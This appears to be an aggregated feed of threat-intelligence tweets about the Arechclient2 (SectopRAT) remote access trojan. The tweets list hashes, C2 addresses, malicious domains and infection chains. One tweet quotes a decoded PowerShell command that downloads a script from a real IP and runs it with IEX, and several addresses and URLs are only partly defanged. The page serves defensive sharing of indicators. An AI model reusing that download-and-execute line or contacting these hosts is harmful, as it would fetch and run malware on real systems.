Top Tweets for #Arechclient2

📌 Malicious PDFs are directly targeting Turkey.
IoCs:
• c28f8fa5f0cb8c6a942b6b7f1884dcf5
• c6c3194a1f081ab7dc840cbf588e2ef4
• 176[.]65[.]132[.]6
• evgshippingline[.]com
#StealC - #Vidar - #ArechClient2 - #SectopRAT
source: @kaspersky
IoC claim: @malpulse
![skocherhan's tweet photo. 36[.]255[.]98[.]59:9000/wbinjget
AS208137 Feo Prest SRL 🇹🇼
#Arechclient2 #SecTopRAT #RedlineStealer https://t.co/uHWjmuxj5P](https://pbs.twimg.com/media/G6WaEl-WcAAQjLD.png)

![skocherhan's tweet photo. 107[.]189[.]21[.]86:9000/wbinjget
AS14956 ROUTERHOSTING 🇳🇱
#Arechclient2 #SecTopRAT https://t.co/pq55gL2bvo](https://pbs.twimg.com/media/G6VbZnoW8AA1g-9.png)

2025-08-15 (Friday): #LummaStealer infection leads to #SectopRAT (#ArechClient2). Details at https://t.co/V3kqDD6I37

#ClickFix -> #GHOSTPULSE -> #ARECHCLIENT2
Observed a Clickfix campaign on a compromised site that follows the same infection chain documented by Elastic a few days ago...
Ghostpulse extracted: d6b1f2a67270a2e955aaf5cd1ad60ce0303f140479cc882a3ab8e623f76b1f81
#elastic

HOST-BANNER_0_HASH: `82cddf3a9bff315d8fc708e5f5f85f20`
Looks like a solid predictive indicator for #ARECHCLIENT2/#SECTOPRAT redirector infra.
CC: @500mk500, @SreekarMad, @ValidinLLC
#GHOSTPULSE

New research from #ElasticSecurityLabs uncovers a new ClickFix campaign! Learn how attackers are using GHOSTPULSE and ARECHCLIENT2 (SECTOPRAT) in multi-stage attacks to deploy RATs and steal data. Stay informed: https://t.co/ndKdRIj76P
@daniel_sloof @petikvx @500mk500 @malwrhunterteam @abuse_ch @VirITeXplorer @marsomx_ @1ZRR4H @AndreaDraghetti @0xToxin @pr0xylife I uploaded some samples
👇
https://t.co/jQXYwkXME1
👇
#LummaStealer
#ArechClient2
#HijackLoader
#XenoRAT
#RemcosRAT
#Stealc
#Aurotun
#ShadowLadder

#Arechclient2 (LNK from #Ukraine) dropping this one with two malicious DLLs:
hxxp://195.82.147(.)93/adm005/033025-ll/husbandspecific.zip @abuse_ch
https://t.co/YcCCHfl3xh
C2: 45.141.84(.)229 (RU)
Original LNK: https://t.co/rPv5asDYQi
6c0511faea7ad1018ef12ee991d8827c
trusthostme[.]com/cgi-bin/
appsupportme[.]com/cgi-bin/
#opendir #Arechclient2
Arechclient2 Malware Analysis (sectopRAT) #Arechclient2 #MalwareAnalysis #Phishing #EmailScams #CybersecurityBlog https://t.co/5d7RDReQH2
Related Samples
#SectopRAT #arechclient2 92.255.85[.]36
👇
https://t.co/NMC8Co4eQj
cc @smica83 @500mk500 @spektrumdj
The Base64 string:
$New-Object Net.WebClient).DownloadString(‘http://216.238.90.145/w/koa’) | IEX
Related signed samples (#netsupport/#Arechclient2/etc
👇
https://t.co/JYYkYMqsOP
cc @SquiblydooBlog
Related from application_setup.js
MD5 4b13356fa0d0db85191d22218bf9c9ac
5.252.153.]241 93.109.69.]5
👇
https://t.co/Tq6HAA8a6D
>#TeamViewer
cc @500mk500
@James_inthe_box #netsupport #rat Related Samples Uploaded
*.exe>*.part01.exe to *.part*.rar >netsupport
MD5 5f38d7a73e9550147d3c10a036985a72
client32.ini 2025-01-22
MD5 7067af414215ee4c50bfcd3ea43c84f0
NSM.LIC 2019-08-05
Samples
https://t.co/uipKzIr08L
https://t.co/toWEkck2uh
cc @500mk500

👾 #Arechclient2, also known as #SectopRAT, is a Remote Access #Trojan active since 2019
It leverages scripts and process injection to infect systems, stealing browser and #crypto wallet data
Learn more and get fresh #IOCs & samples
🔗 https://t.co/67onHOJupo

docu-signer[.]com
👇Samples
https://t.co/jN9QTYOe0n
⛔️https://docu-signer.]com/api/uz/0912545164/
updater.bin autoit
log4cxx.dll a3x config
#Arechclient2 Backdoor/SecTopRAT Related Activity
C2
⛔️185.147.124.236[:9000
❇️https://t.co/LMAHRSbomJ
h/t @malwrhunterteam
⚠️ #Emmenhtal #loader uses #LOLBAS to deliver #malware as part of an ongoing campaign
📝 So far, we found #Arechclient2, #Lumma, #Hijackloader, and #Amadey being delivered by Emmenhtal. Each sample makes heavy use of malicious scripts.
⚙️ You can see what these #scripts do using #ANYRUN's Script Tracer:
First sample of this campaign we discovered: https://t.co/zcbwB2Vjy0
Arechclient2: https://t.co/vOkTHrXNZW
Lumma: https://t.co/6452M7Yodj
Amadey: https://t.co/qLlCuDG9AS
Hijackloader: https://t.co/3G1eUpYCtS
🔗 Execution chain:
#LNK initiates #Forfiles ➡️ #Forfiles locates #HelpPane ➡️ PowerShell launches #Mshta with the AES-encrypted first-stage #payload ➡️ Mshta decrypts and executes the downloaded #payload ➡️ #PowerShell runs an #AES-encrypted command to decrypt #Emmenhtal
➡️ The final PowerShell script is the #Emmenhtal loader which launches a payload (often Updater.exe) with a binary file with a generated name as an argument ➡️ Malware infects the system
🕵️ CyberChef recipe:
https://t.co/gnSFZiTAfs
💢 TI Lookup queries to find more Emmenhtal samples:
https://t.co/m20Ba9hRyn
https://t.co/6QJR1zSmqD
💡 Stay tuned for more insights!

#SectopRAT, aka #ArechClient2 is being delivered via #Lumma Stealer drops.
C2⚙️ #SectopRAT
95.143.190.57:15648
Isolated analysis
👇👇
https://t.co/ercSkdDeNN
Observing an ongoing campaign delivering #ArechClient2 via likely a phishing email (Dropbox shared link), additional intel is appreciated. The initial installer file is packed with Themida.
➡️ The execution chain: EXE > BAT > PS > sleeps for approx. 5-6 min > ArechClient2
➡️ Drops the batch file (containing the payloads), VBS file (responsible for launching the batch file), and renamed PS under %appdata%.
➡️ Adobe Installer serves as a decoy: pastebin[.]com/raw/FDcuBvr5
➡️ Upon further analysis, it appears that the #ScrubCrypt is involved (Batch file > PS, Anti-VM, and persistence via a scheduled task that runs the VBS file at log on of any user)
➡️ ArechClient2: 144.76.195[.]220:15647
I just released a #Blogpost on my recent investigation into a highly obfuscated #Stealer Sample, which turned out to be #SectopRat / #ArechClient2.
It was a wild run and I decided I want to share it with #infosec :)
https://t.co/tFrhESJbz1
2/ #Arechclient2 C2 (https://t.co/wVO2n3qwbk) is also mentioned in this great analysis by @dr4k0nia (plus, an additional server with opendir and +18000 files, possibly the stealer's encrypted logs) 👇
/cc: @Gi7w0rm @abuse_ch
https://t.co/A2Iu4DkqC3

Quick update, extracted some stuff from the .NET stealer payload.
C2:
hxxps://pastebin.com/raw/NdY0fAXm
34.107.35.186:15647
other related IPs:
77.73.133.83
104.20.68.143:443
String dump: https://t.co/cgY4JksFEM
#threatintell #stealer #opendir